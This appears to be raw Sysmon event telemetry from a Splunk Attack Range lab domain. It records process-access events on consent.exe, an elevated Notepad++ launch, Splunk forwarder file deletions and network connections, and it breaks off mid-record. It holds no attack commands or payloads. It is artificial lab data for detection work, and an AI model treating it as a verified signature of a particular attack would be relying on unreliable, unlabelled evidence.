10341000x80000000000000001049157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.617{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.617{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.617{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.455{466BC892-02AF-60E8-1300-00000000CF01}9761504C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.439{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37074066BF5FDC3F19D39220E5AE1B83,SHA256=AAB1D1D35A17F05D303DB44E427AF6C60B4DFC8CAAC501A9DE4F392F8B4D9676,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.371{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.371{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.371{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.371{466BC892-F4E3-60EB-407D-00000000CF01}99727980C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.355{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.355{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.339{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.338{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.336{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.336{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.335{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.335{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.335{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.302{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1014c0C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\appinfo.dll+33d8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.286{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.286{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.286{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.455{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71240CCA47F17FD82D4078DFF493FD1,SHA256=CE4E27EA66D3931B63952A4A808AD59DDE96F528BF4A91B544EEB4A62C0E64F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:08.087{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E7959A40B0E04E5FB4842B676872D4A,SHA256=033848965EBB6C8187089489FEB255BEC175F5F33858265C629C4E0338E92CCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.302{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A55AE63016C07F97D3CCF7789293058,SHA256=193635A11357A8C4C6D500CAE03A07ED866E7A020761A37C029CEB56EF8ED7F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.302{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAD690BCC81A26D3A2A6463AD4DBDBA,SHA256=6081D3B1EDD7F2CFF87A4690256DC5993743A4FC253459E5D7A0072CA642EA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2E2D2F5A05FF28A2954000C4D8DD74,SHA256=2AE75883CC2C6CAD82879E9F76061A5349AEE9BBEE2545A8B0DBD7033DA18920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:09.470{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3824299EA12E7FDEDF047B1D174B27,SHA256=2AB288B0B1BF6D582E4A498958ADEA78B6A9C0CEB43739F0624051F881A4211A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:09.087{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B231E843ABA5F51AA96912C871710C0,SHA256=DE3C23886A9A54F33CD377ECC2DC544ECD0F6B97C1B79561DB7A5E6F240AFC4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:07.392{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57275-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:10.485{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EF354A9B719957B77A50EEE48A1191,SHA256=A23921188F51E47A5390A13AD51CD873C620D1372881B37C0633CD2934E83660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:10.103{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B24BB11EE0EECE83F87B8B49646EB3B0,SHA256=9BD230F5883E7901F8DD50BC178FC5B3AF4142B9134237C48DE40B873569B890,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.714{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51036-false10.0.1.12-8000- 23542300x80000000000000001049202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:11.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76CF61D6D26CDCDBE251BDC6E2F80CFF,SHA256=94334231E5C31C9526E612A7716DA870C6BFBB8B4FADF9AA456E43DA3327C2D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:11.134{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1085C77CD8D99DDF082B5AA517675DDE,SHA256=6AD9DC508509522821591EDCCD94C1552D5B83DB80B2CE9885A71121679D1F50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:12.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD1CAF5B18262FE1A2B00D7546A8FE5,SHA256=A64F755BD33B113D7881A1CEEA8D979F7542902728D9D1E5AF21AE03EA994C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:12.150{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7A1986EC2CE457D9FFF567738A5C26,SHA256=FD2D698434D3D93B66825270358AD152675010015967448C53DBD7A87D1EAF90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:13.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 